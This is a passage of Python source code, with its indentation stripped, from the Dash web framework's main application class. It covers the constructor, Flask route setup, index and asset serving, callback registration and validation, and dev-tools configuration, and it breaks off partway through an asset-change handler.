ensure referenced IDs exist and props are valid. Set to ``True``
if your layout is dynamic, to bypass these checks.
env: ``DASH_SUPPRESS_CALLBACK_EXCEPTIONS``
:type suppress_callback_exceptions: boolean
:param show_undo_redo: Default ``False``, set to ``True`` to enable undo
and redo buttons for stepping through the history of the app state.
:type show_undo_redo: boolean
:param plugins: Extend Dash functionality by passing a list of objects
with a ``plug`` method, taking a single argument: this app, which will
be called after the Flask server is attached.
:type plugins: list of objects
"""
def __init__(
self,
name=None,
server=True,
assets_folder='assets',
assets_url_path='assets',
assets_ignore='',
assets_external_path=None,
include_assets_files=True,
url_base_pathname=None,
requests_pathname_prefix=None,
routes_pathname_prefix=None,
serve_locally=True,
compress=True,
meta_tags=None,
index_string=_default_index,
external_scripts=None,
external_stylesheets=None,
suppress_callback_exceptions=None,
show_undo_redo=False,
plugins=None,
**obsolete):
for key in obsolete:
if key in ['components_cache_max_age', 'static_folder']:
raise exceptions.ObsoleteKwargException(
key + ' is no longer a valid keyword argument in Dash '
'since v1.0. See https://dash.plot.ly for details.'
)
# any other kwarg mimic the built-in exception
raise TypeError(
"Dash() got an unexpected keyword argument '" + key + "'"
)
# We have 3 cases: server is either True (we create the server), False
# (defer server creation) or a Flask app instance (we use their server)
if isinstance(server, Flask):
self.server = server
if name is None:
name = getattr(server, 'name', '__main__')
elif isinstance(server, bool):
name = name if name else '__main__'
self.server = Flask(name) if server else None
else:
raise ValueError('server must be a Flask app or a boolean')
base_prefix, routes_prefix, requests_prefix = pathname_configs(
url_base_pathname, routes_pathname_prefix, requests_pathname_prefix
)
self.config = _AttributeDict(
name=name,
assets_folder=os.path.join(
flask.helpers.get_root_path(name), assets_folder),
assets_url_path=assets_url_path,
assets_ignore=assets_ignore,
assets_external_path=get_combined_config(
'assets_external_path', assets_external_path, ''),
include_assets_files=get_combined_config(
'include_assets_files', include_assets_files, True),
url_base_pathname=base_prefix,
routes_pathname_prefix=routes_prefix,
requests_pathname_prefix=requests_prefix,
serve_locally=serve_locally,
compress=compress,
meta_tags=meta_tags or [],
external_scripts=external_scripts or [],
external_stylesheets=external_stylesheets or [],
suppress_callback_exceptions=get_combined_config(
'suppress_callback_exceptions',
suppress_callback_exceptions,
False),
show_undo_redo=show_undo_redo
)
self.config.set_read_only([
'name',
'assets_folder',
'assets_url_path',
'url_base_pathname',
'routes_pathname_prefix',
'requests_pathname_prefix',
'serve_locally',
'compress',
], 'Read-only: can only be set in the Dash constructor')
self.config.finalize(
'Invalid config key. Some settings are only available '
'via the Dash constructor'
)
# list of dependencies
self.callback_map = {}
# index_string has special setter so can't go in config
self._index_string = ''
self.index_string = index_string
self._favicon = None
# default renderer string
self.renderer = 'var renderer = new DashRenderer();'
# static files from the packages
self.css = Css(serve_locally)
self.scripts = Scripts(serve_locally)
self.registered_paths = collections.defaultdict(set)
# urls
self.routes = []
self._layout = None
self._cached_layout = None
self._setup_dev_tools()
self._hot_reload = _AttributeDict(
hash=None,
hard=False,
lock=threading.RLock(),
watch_thread=None,
changed_assets=[]
)
self._assets_files = []
self.logger = logging.getLogger(name)
self.logger.addHandler(logging.StreamHandler(stream=sys.stdout))
if isinstance(plugins, _patch_collections_abc('Iterable')):
for plugin in plugins:
plugin.plug(self)
if self.server is not None:
self.init_app()
def init_app(self, app=None):
"""
Initialize the parts of Dash that require a flask app
"""
config = self.config
if app is not None:
self.server = app
assets_blueprint_name = '{}{}'.format(
config.routes_pathname_prefix.replace('/', '_'),
'dash_assets'
)
self.server.register_blueprint(
flask.Blueprint(
assets_blueprint_name,
config.name,
static_folder=self.config.assets_folder,
static_url_path='{}{}'.format(
config.routes_pathname_prefix,
self.config.assets_url_path.lstrip('/')
)
)
)
if config.compress:
# gzip
Compress(self.server)
@self.server.errorhandler(exceptions.PreventUpdate)
def _handle_error(_):
"""Handle a halted callback and return an empty 204 response"""
return '', 204
prefix = config.routes_pathname_prefix
self.server.before_first_request(self._setup_server)
# add a handler for components suites errors to return 404
self.server.errorhandler(exceptions.InvalidResourceError)(
self._invalid_resources_handler)
self._add_url('{}_dash-layout'.format(prefix), self.serve_layout)
self._add_url('{}_dash-dependencies'.format(prefix), self.dependencies)
self._add_url(
'{}_dash-update-component'.format(prefix),
self.dispatch,
['POST'])
self._add_url(
(
'{}_dash-component-suites'
'/<string:package_name>'
'/<path:path_in_package_dist>'
).format(prefix),
self.serve_component_suites)
self._add_url('{}_dash-routes'.format(prefix), self.serve_routes)
self._add_url(prefix, self.index)
self._add_url('{}_reload-hash'.format(prefix), self.serve_reload_hash)
# catch-all for front-end routes, used by dcc.Location
self._add_url('{}<path:path>'.format(prefix), self.index)
self._add_url(
'{}_favicon.ico'.format(prefix),
self._serve_default_favicon)
def _add_url(self, name, view_func, methods=('GET',)):
self.server.add_url_rule(
name,
view_func=view_func,
endpoint=name,
methods=list(methods))
# record the url in Dash.routes so that it can be accessed later
# e.g. for adding authentication with flask_login
self.routes.append(name)
@property
def layout(self):
return self._layout
def _layout_value(self):
if isinstance(self._layout, _patch_collections_abc('Callable')):
self._cached_layout = self._layout()
else:
self._cached_layout = self._layout
return self._cached_layout
@layout.setter
def layout(self, value):
if (not isinstance(value, Component) and
not isinstance(value, _patch_collections_abc('Callable'))):
raise exceptions.NoLayoutException(
'Layout must be a dash component '
'or a function that returns '
'a dash component.')
self._layout = value
@property
def index_string(self):
return self._index_string
@index_string.setter
def index_string(self, value):
checks = (
(_re_index_entry.search(value), 'app_entry'),
(_re_index_config.search(value), 'config',),
(_re_index_scripts.search(value), 'scripts'),
)
missing = [missing for check, missing in checks if not check]
if missing:
raise exceptions.InvalidIndexException(
'Did you forget to include {} in your index string ?'.format(
', '.join('{%' + x + '%}' for x in missing)
)
)
self._index_string = value
def serve_layout(self):
layout = self._layout_value()
# TODO - Set browser cache limit - pass hash into frontend
return flask.Response(
json.dumps(layout, cls=plotly.utils.PlotlyJSONEncoder),
mimetype='application/json'
)
def _config(self):
# pieces of config needed by the front end
config = {
'url_base_pathname': self.config.url_base_pathname,
'requests_pathname_prefix': self.config.requests_pathname_prefix,
'ui': self._dev_tools.ui,
'props_check': self._dev_tools.props_check,
'show_undo_redo': self.config.show_undo_redo
}
if self._dev_tools.hot_reload:
config['hot_reload'] = {
# convert from seconds to msec as used by js `setInterval`
'interval': int(self._dev_tools.hot_reload_interval * 1000),
'max_retry': self._dev_tools.hot_reload_max_retry
}
return config
def serve_reload_hash(self):
_reload = self._hot_reload
with _reload.lock:
hard = _reload.hard
changed = _reload.changed_assets
_hash = _reload.hash
_reload.hard = False
_reload.changed_assets = []
return flask.jsonify({
'reloadHash': _hash,
'hard': hard,
'packages': list(self.registered_paths.keys()),
'files': list(changed)
})
def serve_routes(self):
return flask.Response(
json.dumps(self.routes, cls=plotly.utils.PlotlyJSONEncoder),
mimetype='application/json'
)
def _collect_and_register_resources(self, resources):
# now needs the app context.
# template in the necessary component suite JS bundles
# add the version number of the package as a query parameter
# for cache busting
def _relative_url_path(relative_package_path='', namespace=''):
module_path = os.path.join(
os.path.dirname(sys.modules[namespace].__file__),
relative_package_path)
modified = int(os.stat(module_path).st_mtime)
return '{}_dash-component-suites/{}/{}?v={}&m={}'.format(
self.config.requests_pathname_prefix,
namespace,
relative_package_path,
importlib.import_module(namespace).__version__,
modified
)
srcs = []
for resource in resources:
is_dynamic_resource = resource.get('dynamic', False)
if 'relative_package_path' in resource:
paths = resource['relative_package_path']
paths = [paths] if isinstance(paths, str) else paths
for rel_path in paths:
self.registered_paths[resource['namespace']].add(rel_path)
if not is_dynamic_resource:
srcs.append(_relative_url_path(
relative_package_path=rel_path,
namespace=resource['namespace']
))
elif 'external_url' in resource:
if not is_dynamic_resource:
if isinstance(resource['external_url'], str):
srcs.append(resource['external_url'])
else:
srcs += resource['external_url']
elif 'absolute_path' in resource:
raise Exception(
'Serving files from absolute_path isn\'t supported yet'
)
elif 'asset_path' in resource:
static_url = self.get_asset_url(resource['asset_path'])
# Add a cache-busting query param
static_url += '?m={}'.format(resource['ts'])
srcs.append(static_url)
return srcs
def _generate_css_dist_html(self):
external_links = self.config.external_stylesheets
links = self._collect_and_register_resources(self.css.get_all_css())
return '\n'.join([
_format_tag('link', link, opened=True)
if isinstance(link, dict)
else '<link rel="stylesheet" href="{}">'.format(link)
for link in (external_links + links)
])
def _generate_scripts_html(self):
# Dash renderer has dependencies like React which need to be rendered
# before every other script. However, the dash renderer bundle
# itself needs to be rendered after all of the component's
# scripts have rendered.
# The rest of the scripts can just be loaded after React but before
# dash renderer.
# pylint: disable=protected-access
mode = 'dev' if self._dev_tools['props_check'] is True else 'prod'
deps = []
for js_dist_dependency in dash_renderer._js_dist_dependencies:
dep = {}
for key, value in js_dist_dependency.items():
dep[key] = value[mode] if isinstance(value, dict) else value
deps.append(dep)
dev = self._dev_tools.serve_dev_bundles
srcs = (
self._collect_and_register_resources(
self.scripts._resources._filter_resources(
deps, dev_bundles=dev
)
) +
self.config.external_scripts +
self._collect_and_register_resources(
self.scripts.get_all_scripts(dev_bundles=dev) +
self.scripts._resources._filter_resources(
dash_renderer._js_dist, dev_bundles=dev
)
)
)
return '\n'.join([
_format_tag('script', src)
if isinstance(src, dict)
else '<script src="{}"></script>'.format(src)
for src in srcs
])
def _generate_config_html(self):
return (
'<script id="_dash-config" type="application/json">'
'{}'
'</script>'
).format(json.dumps(self._config()))
def _generate_renderer(self):
return (
'<script id="_dash-renderer" type="application/javascript">'
'{}'
'</script>'
).format(self.renderer)
def _generate_meta_html(self):
meta_tags = self.config.meta_tags
has_ie_compat = any(
x.get('http-equiv', '') == 'X-UA-Compatible' for x in meta_tags
)
has_charset = any('charset' in x for x in meta_tags)
tags = []
if not has_ie_compat:
tags.append(
'<meta http-equiv="X-UA-Compatible" content="IE=edge">'
)
if not has_charset:
tags.append('<meta charset="UTF-8">')
tags += [_format_tag('meta', x, opened=True) for x in meta_tags]
return '\n '.join(tags)
# Serve the JS bundles for each package
def serve_component_suites(self, package_name, path_in_package_dist):
if package_name not in self.registered_paths:
raise exceptions.DependencyException(
'Error loading dependency.\n'
'"{}" is not a registered library.\n'
'Registered libraries are: {}'
.format(package_name, list(self.registered_paths.keys())))
if path_in_package_dist not in self.registered_paths[package_name]:
raise exceptions.DependencyException(
'"{}" is registered but the path requested is not valid.\n'
'The path requested: "{}"\n'
'List of registered paths: {}'
.format(
package_name, path_in_package_dist, self.registered_paths
)
)
mimetype = ({
'js': 'application/javascript',
'css': 'text/css',
'map': 'application/json'
})[path_in_package_dist.split('.')[-1]]
return Response(
pkgutil.get_data(package_name, path_in_package_dist),
mimetype=mimetype
)
def index(self, *args, **kwargs): # pylint: disable=unused-argument
scripts = self._generate_scripts_html()
css = self._generate_css_dist_html()
config = self._generate_config_html()
metas = self._generate_meta_html()
renderer = self._generate_renderer()
title = getattr(self, 'title', 'Dash')
if self._favicon:
favicon_mod_time = os.path.getmtime(
os.path.join(self.config.assets_folder, self._favicon))
favicon_url = self.get_asset_url(self._favicon) + '?m={}'.format(
favicon_mod_time
)
else:
favicon_url = '{}_favicon.ico?v={}'.format(
self.config.requests_pathname_prefix,
__version__)
favicon = _format_tag('link', {
'rel': 'icon',
'type': 'image/x-icon',
'href': favicon_url
}, opened=True)
index = self.interpolate_index(
metas=metas, title=title, css=css, config=config,
scripts=scripts, app_entry=_app_entry, favicon=favicon,
renderer=renderer)
checks = (
(_re_index_entry_id.search(index), '#react-entry-point'),
(_re_index_config_id.search(index), '#_dash-configs'),
(_re_index_scripts_id.search(index), 'dash-renderer'),
(_re_renderer_scripts_id.search(index), 'new DashRenderer'),
)
missing = [missing for check, missing in checks if not check]
if missing:
plural = 's' if len(missing) > 1 else ''
raise exceptions.InvalidIndexException(
'Missing element{pl} {ids} in index.'.format(
ids=', '.join(missing),
pl=plural
)
)
return index
def interpolate_index(
self,
metas='',
title='',
css='',
config='',
scripts='',
app_entry='',
favicon='',
renderer=''):
"""
Called to create the initial HTML string that is loaded on page.
Override this method to provide you own custom HTML.
:Example:
class MyDash(dash.Dash):
def interpolate_index(self, **kwargs):
return '''
<!DOCTYPE html>
<html>
<head>
<title>My App</title>
</head>
<body>
<div id="custom-header">My custom header</div>
{app_entry}
{config}
{scripts}
{renderer}
<div id="custom-footer">My custom footer</div>
</body>
</html>
'''.format(
app_entry=kwargs.get('app_entry'),
config=kwargs.get('config'),
scripts=kwargs.get('scripts'),
renderer=kwargs.get('renderer'))
:param metas: Collected & formatted meta tags.
:param title: The title of the app.
:param css: Collected & formatted css dependencies as <link> tags.
:param config: Configs needed by dash-renderer.
:param scripts: Collected & formatted scripts tags.
:param renderer: A script tag that instantiates the DashRenderer.
:param app_entry: Where the app will render.
:param favicon: A favicon <link> tag if found in assets folder.
:return: The interpolated HTML string for the index.
"""
return _interpolate(
self.index_string,
metas=metas,
title=title,
css=css,
config=config,
scripts=scripts,
favicon=favicon,
renderer=renderer,
app_entry=app_entry
)
def dependencies(self):
return flask.jsonify([
{
'output': k,
'inputs': v['inputs'],
'state': v['state'],
'clientside_function': v.get('clientside_function', None)
} for k, v in self.callback_map.items()
])
def _validate_callback(self, output, inputs, state):
# pylint: disable=too-many-branches
layout = self._cached_layout or self._layout_value()
is_multi = isinstance(output, (list, tuple))
if (layout is None and not self.config.suppress_callback_exceptions):
# Without a layout, we can't do validation on the IDs and
# properties of the elements in the callback.
raise exceptions.LayoutIsNotDefined('''
Attempting to assign a callback to the application but
the `layout` property has not been assigned.
Assign the `layout` property before assigning callbacks.
Alternatively, suppress this warning by setting
`suppress_callback_exceptions=True`
'''.replace(' ', ''))
outputs = output if is_multi else [output]
for args, obj, name in [(outputs, Output, 'Output'),
(inputs, Input, 'Input'),
(state, State, 'State')]:
if not isinstance(args, (list, tuple)):
raise exceptions.IncorrectTypeException(
'The {} argument `{}` must be '
'a list or tuple of `dash.dependencies.{}`s.'.format(
name.lower(), str(args), name
))
for arg in args:
if not isinstance(arg, obj):
raise exceptions.IncorrectTypeException(
'The {} argument `{}` must be '
'of type `dash.{}`.'.format(
name.lower(), str(arg), name
))
invalid_characters = ['.']
if any(x in arg.component_id for x in invalid_characters):
raise exceptions.InvalidComponentIdError(
'The element `{}` contains {} in its ID. '
'Periods are not allowed in IDs.'.format(
arg.component_id, invalid_characters
))
if not self.config.suppress_callback_exceptions:
layout_id = getattr(layout, 'id', None)
arg_id = arg.component_id
arg_prop = getattr(arg, 'component_property', None)
if (arg_id not in layout and arg_id != layout_id):
raise exceptions.NonExistentIdException('''
Attempting to assign a callback to the
component with the id "{0}" but no
components with id "{0}" exist in the
app\'s layout.\n\n
Here is a list of IDs in layout:\n{1}\n\n
If you are assigning callbacks to components
that are generated by other callbacks
(and therefore not in the initial layout), then
you can suppress this exception by setting
`suppress_callback_exceptions=True`.
'''.format(
arg_id,
list(layout.keys()) + (
[layout_id] if layout_id else []
)
).replace(' ', ''))
component = (
layout if layout_id == arg_id else layout[arg_id]
)
if (arg_prop and
arg_prop not in component.available_properties and
not any(arg_prop.startswith(w) for w in
component.available_wildcard_properties)):
raise exceptions.NonExistentPropException('''
Attempting to assign a callback with
the property "{0}" but the component
"{1}" doesn't have "{0}" as a property.\n
Here are the available properties in "{1}":
{2}
'''.format(
arg_prop, arg_id, component.available_properties
).replace(' ', ''))
if hasattr(arg, 'component_event'):
raise exceptions.NonExistentEventException('''
Events have been removed.
Use the associated property instead.
'''.replace(' ', ''))
if state and not inputs:
raise exceptions.MissingInputsException('''
This callback has {} `State` {}
but no `Input` elements.\n
Without `Input` elements, this callback
will never get called.\n
(Subscribing to input components will cause the
callback to be called whenever their values change.)
'''.format(
len(state),
'elements' if len(state) > 1 else 'element'
).replace(' ', ''))
for i in inputs:
bad = None
if is_multi:
for o in output:
if o == i:
bad = o
else:
if output == i:
bad = output
if bad:
raise exceptions.SameInputOutputException(
'Same output and input: {}'.format(bad)
)
if is_multi:
if len(set(output)) != len(output):
raise exceptions.DuplicateCallbackOutput(
'Same output was used more than once in a '
'multi output callback!\n Duplicates:\n {}'.format(
',\n'.join(
k for k, v in
((str(x), output.count(x)) for x in output)
if v > 1
)
)
)
callback_id = _create_callback_id(output)
callbacks = set(itertools.chain(*(
x[2:-2].split('...')
if x.startswith('..')
else [x]
for x in self.callback_map
)))
ns = {
'duplicates': set()
}
if is_multi:
def duplicate_check():
ns['duplicates'] = callbacks.intersection(
str(y) for y in output
)
return ns['duplicates']
else:
def duplicate_check():
return callback_id in callbacks
if duplicate_check():
if is_multi:
msg = '''
Multi output {} contains an `Output` object
that was already assigned.
Duplicates:
{}
'''.format(
callback_id,
pprint.pformat(ns['duplicates'])
).replace(' ', '')
else:
msg = '''
You have already assigned a callback to the output
with ID "{}" and property "{}". An output can only have
a single callback function. Try combining your inputs and
callback functions together into one function.
'''.format(
output.component_id,
output.component_property
).replace(' ', '')
raise exceptions.DuplicateCallbackOutput(msg)
@staticmethod
def _validate_callback_output(output_value, output):
valid = [str, dict, int, float, type(None), Component]
def _raise_invalid(bad_val, outer_val, path, index=None,
toplevel=False):
bad_type = type(bad_val).__name__
outer_id = "(id={:s})".format(outer_val.id) \
if getattr(outer_val, 'id', False) else ''
outer_type = type(outer_val).__name__
raise exceptions.InvalidCallbackReturnValue('''
The callback for `{output:s}`
returned a {object:s} having type `{type:s}`
which is not JSON serializable.
{location_header:s}{location:s}
and has string representation
`{bad_val}`
In general, Dash properties can only be
dash components, strings, dictionaries, numbers, None,
or lists of those.
'''.format(
output=repr(output),
object='tree with one value' if not toplevel else 'value',
type=bad_type,
location_header=(
'The value in question is located at'
if not toplevel else
'''The value in question is either the only value returned,
or is in the top level of the returned list,'''
),
location=(
"\n" +
("[{:d}] {:s} {:s}".format(index, outer_type, outer_id)
if index is not None
else ('[*] ' + outer_type + ' ' + outer_id))
+ "\n" + path + "\n"
) if not toplevel else '',
bad_val=bad_val
).replace(' ', ''))
def _value_is_valid(val):
return (
# pylint: disable=unused-variable
any([isinstance(val, x) for x in valid]) or
type(val).__name__ == 'unicode'
)
def _validate_value(val, index=None):
# val is a Component
if isinstance(val, Component):
# pylint: disable=protected-access
for p, j in val._traverse_with_paths():
# check each component value in the tree
if not _value_is_valid(j):
_raise_invalid(
bad_val=j,
outer_val=val,
path=p,
index=index
)
# Children that are not of type Component or
# list/tuple not returned by traverse
child = getattr(j, 'children', None)
if not isinstance(child, (tuple,
collections.MutableSequence)):
if child and not _value_is_valid(child):
_raise_invalid(
bad_val=child,
outer_val=val,
path=p + "\n" + "[*] " + type(child).__name__,
index=index
)
# Also check the child of val, as it will not be returned
child = getattr(val, 'children', None)
if not isinstance(child, (tuple, collections.MutableSequence)):
if child and not _value_is_valid(child):
_raise_invalid(
bad_val=child,
outer_val=val,
path=type(child).__name__,
index=index
)
# val is not a Component, but is at the top level of tree
else:
if not _value_is_valid(val):
_raise_invalid(
bad_val=val,
outer_val=type(val).__name__,
path='',
index=index,
toplevel=True
)
if isinstance(output_value, list):
for i, val in enumerate(output_value):
_validate_value(val, index=i)
else:
_validate_value(output_value)
# pylint: disable=dangerous-default-value
def clientside_callback(
self, clientside_function, output, inputs=[], state=[]):
"""
Create a callback that updates the output by calling a clientside
(JavaScript) function instead of a Python function.
Unlike `@app.calllback`, `clientside_callback` is not a decorator:
it takes a
`dash.dependencies.ClientsideFunction(namespace, function_name)`
argument that describes which JavaScript function to call
(Dash will look for the JavaScript function at
`window[namespace][function_name]`).
For example:
```
app.clientside_callback(
ClientsideFunction('my_clientside_library', 'my_function'),
Output('my-div' 'children'),
[Input('my-input', 'value'),
Input('another-input', 'value')]
)
```
With this signature, Dash's front-end will call
`window.my_clientside_library.my_function` with the current
values of the `value` properties of the components
`my-input` and `another-input` whenever those values change.
Include a JavaScript file by including it your `assets/` folder.
The file can be named anything but you'll need to assign the
function's namespace to the `window`. For example, this file might
look like:
```
window.my_clientside_library = {
my_function: function(input_value_1, input_value_2) {
return (
parseFloat(input_value_1, 10) +
parseFloat(input_value_2, 10)
);
}
}
```
"""
self._validate_callback(output, inputs, state)
callback_id = _create_callback_id(output)
self.callback_map[callback_id] = {
'inputs': [
{'id': c.component_id, 'property': c.component_property}
for c in inputs
],
'state': [
{'id': c.component_id, 'property': c.component_property}
for c in state
],
'clientside_function': {
'namespace': clientside_function.namespace,
'function_name': clientside_function.function_name
}
}
# TODO - Update nomenclature.
# "Parents" and "Children" should refer to the DOM tree
# and not the dependency tree.
# The dependency tree should use the nomenclature
# "observer" and "controller".
# "observers" listen for changes from their "controllers". For example,
# if a graph depends on a dropdown, the graph is the "observer" and the
# dropdown is a "controller". In this case the graph's "dependency" is
# the dropdown.
# TODO - Check this map for recursive or other ill-defined non-tree
# relationships
# pylint: disable=dangerous-default-value
def callback(self, output, inputs=[], state=[]):
self._validate_callback(output, inputs, state)
callback_id = _create_callback_id(output)
multi = isinstance(output, (list, tuple))
self.callback_map[callback_id] = {
'inputs': [
{'id': c.component_id, 'property': c.component_property}
for c in inputs
],
'state': [
{'id': c.component_id, 'property': c.component_property}
for c in state
],
}
def wrap_func(func):
@wraps(func)
def add_context(*args, **kwargs):
output_value = func(*args, **kwargs)
if multi:
if not isinstance(output_value, (list, tuple)):
raise exceptions.InvalidCallbackReturnValue(
'The callback {} is a multi-output.\n'
'Expected the output type to be a list'
' or tuple but got {}.'.format(
callback_id, repr(output_value)
)
)
if not len(output_value) == len(output):
raise exceptions.InvalidCallbackReturnValue(
'Invalid number of output values for {}.\n'
' Expected {} got {}'.format(
callback_id,
len(output),
len(output_value)
)
)
component_ids = collections.defaultdict(dict)
has_update = False
for i, o in enumerate(output):
val = output_value[i]
if val is not no_update:
has_update = True
o_id, o_prop = o.component_id, o.component_property
component_ids[o_id][o_prop] = val
if not has_update:
raise exceptions.PreventUpdate
response = {
'response': component_ids,
'multi': True
}
else:
if output_value is no_update:
raise exceptions.PreventUpdate
response = {
'response': {
'props': {
output.component_property: output_value
}
}
}
try:
jsonResponse = json.dumps(
response,
cls=plotly.utils.PlotlyJSONEncoder
)
except TypeError:
self._validate_callback_output(output_value, output)
raise exceptions.InvalidCallbackReturnValue('''
The callback for property `{property:s}`
of component `{id:s}` returned a value
which is not JSON serializable.
In general, Dash properties can only be
dash components, strings, dictionaries, numbers, None,
or lists of those.
'''.format(
property=output.component_property,
id=output.component_id
).replace(' ', ''))
return jsonResponse
self.callback_map[callback_id]['callback'] = add_context
return add_context
return wrap_func
def dispatch(self):
body = flask.request.get_json()
inputs = body.get('inputs', [])
state = body.get('state', [])
output = body['output']
args = []
flask.g.input_values = input_values = {
'{}.{}'.format(x['id'], x['property']): x.get('value')
for x in inputs
}
flask.g.state_values = {
'{}.{}'.format(x['id'], x['property']): x.get('value')
for x in state
}
changed_props = body.get('changedPropIds')
flask.g.triggered_inputs = [
{'prop_id': x, 'value': input_values[x]}
for x in changed_props
] if changed_props else []
response = flask.g.dash_response = flask.Response(
mimetype='application/json')
for component_registration in self.callback_map[output]['inputs']:
args.append([
c.get('value', None) for c in inputs if
c['property'] == component_registration['property'] and
c['id'] == component_registration['id']
][0])
for component_registration in self.callback_map[output]['state']:
args.append([
c.get('value', None) for c in state if
c['property'] == component_registration['property'] and
c['id'] == component_registration['id']
][0])
response.set_data(self.callback_map[output]['callback'](*args))
return response
def _validate_layout(self):
if self.layout is None:
raise exceptions.NoLayoutException(
'The layout was `None` '
'at the time that `run_server` was called. '
'Make sure to set the `layout` attribute of your application '
'before running the server.')
to_validate = self._layout_value()
layout_id = getattr(self.layout, 'id', None)
component_ids = {layout_id} if layout_id else set()
# pylint: disable=protected-access
for component in to_validate._traverse():
component_id = getattr(component, 'id', None)
if component_id and component_id in component_ids:
raise exceptions.DuplicateIdError(
'Duplicate component id found'
' in the initial layout: `{}`'.format(component_id))
component_ids.add(component_id)
def _setup_server(self):
if self.config.include_assets_files:
self._walk_assets_directory()
self._validate_layout()
self._generate_scripts_html()
self._generate_css_dist_html()
def _add_assets_resource(self, url_path, file_path):
res = {'asset_path': url_path, 'filepath': file_path}
if self.config.assets_external_path:
res['external_url'] = '{}{}'.format(
self.config.assets_external_path, url_path)
self._assets_files.append(file_path)
return res
def _walk_assets_directory(self):
walk_dir = self.config.assets_folder
slash_splitter = re.compile(r'[\\/]+')
ignore_str = self.config.assets_ignore
ignore_filter = re.compile(ignore_str) if ignore_str else None
for current, _, files in os.walk(walk_dir):
if current == walk_dir:
base = ''
else:
s = current.replace(walk_dir, '').lstrip('\\').lstrip('/')
splitted = slash_splitter.split(s)
if len(splitted) > 1:
base = '/'.join(slash_splitter.split(s))
else:
base = splitted[0]
if ignore_filter:
files_gen = (x for x in files if not ignore_filter.search(x))
else:
files_gen = files
for f in sorted(files_gen):
path = '/'.join([base, f]) if base else f
full = os.path.join(current, f)
if f.endswith('js'):
self.scripts.append_script(
self._add_assets_resource(path, full))
elif f.endswith('css'):
self.css.append_css(self._add_assets_resource(path, full))
elif f == 'favicon.ico':
self._favicon = path
@staticmethod
def _invalid_resources_handler(err):
return err.args[0], 404
@staticmethod
def _serve_default_favicon():
return flask.Response(
pkgutil.get_data('dash', 'favicon.ico'),
content_type='image/x-icon',
)
def get_asset_url(self, path):
asset = _get_asset_path(
self.config.requests_pathname_prefix,
path,
self.config.assets_url_path.lstrip('/')
)
return asset
def _setup_dev_tools(self, **kwargs):
debug = kwargs.get('debug', False)
dev_tools = self._dev_tools = _AttributeDict()
for attr in (
'ui',
'props_check',
'serve_dev_bundles',
'hot_reload',
'silence_routes_logging'
):
dev_tools[attr] = get_combined_config(
attr, kwargs.get(attr, None), default=debug
)
for attr, _type, default in (
('hot_reload_interval', float, 3),
('hot_reload_watch_interval', float, 0.5),
('hot_reload_max_retry', int, 8)
):
dev_tools[attr] = _type(
get_combined_config(
attr, kwargs.get(attr, None), default=default
)
)
return dev_tools
def enable_dev_tools(
self,
debug=None,
dev_tools_ui=None,
dev_tools_props_check=None,
dev_tools_serve_dev_bundles=None,
dev_tools_hot_reload=None,
dev_tools_hot_reload_interval=None,
dev_tools_hot_reload_watch_interval=None,
dev_tools_hot_reload_max_retry=None,
dev_tools_silence_routes_logging=None):
"""
Activate the dev tools, called by `run_server`. If your application is
served by wsgi and you want to activate the dev tools, you can call
this method out of `__main__`.
All parameters can be set by environment variables as listed.
Values provided here take precedence over environment variables.
Available dev_tools environment variables:
- DASH_DEBUG
- DASH_UI
- DASH_PROPS_CHECK
- DASH_SERVE_DEV_BUNDLES
- DASH_HOT_RELOAD
- DASH_HOT_RELOAD_INTERVAL
- DASH_HOT_RELOAD_WATCH_INTERVAL
- DASH_HOT_RELOAD_MAX_RETRY
- DASH_SILENCE_ROUTES_LOGGING
:param debug: Enable/disable all the dev tools unless overridden by the
arguments or environment variables. Default is ``True`` when
``enable_dev_tools`` is called directly, and ``False`` when called
via ``run_server``. env: ``DASH_DEBUG``
:type debug: bool
:param dev_tools_ui: Show the dev tools UI. env: ``DASH_UI``
:type dev_tools_ui: bool
:param dev_tools_props_check: Validate the types and values of Dash
component props. env: ``DASH_PROPS_CHECK``
:type dev_tools_props_check: bool
:param dev_tools_serve_dev_bundles: Serve the dev bundles. Production
bundles do not necessarily include all the dev tools code.
env: ``DASH_SERVE_DEV_BUNDLES``
:type dev_tools_serve_dev_bundles: bool
:param dev_tools_hot_reload: Activate hot reloading when app, assets,
and component files change. env: ``DASH_HOT_RELOAD``
:type dev_tools_hot_reload: bool
:param dev_tools_hot_reload_interval: Interval in seconds for the
client to request the reload hash. Default 3.
env: ``DASH_HOT_RELOAD_INTERVAL``
:type dev_tools_hot_reload_interval: float
:param dev_tools_hot_reload_watch_interval: Interval in seconds for the
server to check asset and component folders for changes.
Default 0.5. env: ``DASH_HOT_RELOAD_WATCH_INTERVAL``
:type dev_tools_hot_reload_watch_interval: float
:param dev_tools_hot_reload_max_retry: Maximum number of failed reload
hash requests before failing and displaying a pop up. Default 8.
env: ``DASH_HOT_RELOAD_MAX_RETRY``
:type dev_tools_hot_reload_max_retry: int
:param dev_tools_silence_routes_logging: Silence the `werkzeug` logger,
will remove all routes logging. Enabled with debugging by default
because hot reload hash checks generate a lot of requests.
env: ``DASH_SILENCE_ROUTES_LOGGING``
:type dev_tools_silence_routes_logging: bool
:return: debug
"""
if debug is None:
debug = get_combined_config('debug', None, True)
dev_tools = self._setup_dev_tools(
debug=debug,
ui=dev_tools_ui,
props_check=dev_tools_props_check,
serve_dev_bundles=dev_tools_serve_dev_bundles,
hot_reload=dev_tools_hot_reload,
hot_reload_interval=dev_tools_hot_reload_interval,
hot_reload_watch_interval=dev_tools_hot_reload_watch_interval,
hot_reload_max_retry=dev_tools_hot_reload_max_retry,
silence_routes_logging=dev_tools_silence_routes_logging
)
if dev_tools.silence_routes_logging:
logging.getLogger('werkzeug').setLevel(logging.ERROR)
self.logger.setLevel(logging.INFO)
if dev_tools.hot_reload:
_reload = self._hot_reload
_reload.hash = _generate_hash()
component_packages_dist = [
os.path.dirname(package.path)
if hasattr(package, 'path')
else package.filename
for package in (
pkgutil.find_loader(x) for x in
list(ComponentRegistry.registry) + ['dash_renderer']
)
]
_reload.watch_thread = threading.Thread(
target=lambda: _watch.watch(
[self.config.assets_folder] + component_packages_dist,
self._on_assets_change,
sleep_time=dev_tools.hot_reload_watch_interval)
)
_reload.watch_thread.daemon = True
_reload.watch_thread.start()
if (debug and dev_tools.serve_dev_bundles and
not self.scripts.config.serve_locally):
# Dev bundles only works locally.
self.scripts.config.serve_locally = True
print('WARNING: dev bundles requested with serve_locally=False.\n'
'This is not supported, switching to serve_locally=True')
return debug
# noinspection PyProtectedMember
def _on_assets_change(self, filename, modified, deleted):
_reload = self._hot_reload
with _reload.lock:
_reload.hard = True
_reload.hash = _generate_hash()
if self.config.assets_folder in filename:
asset_path = os.path.relpath(
filename,
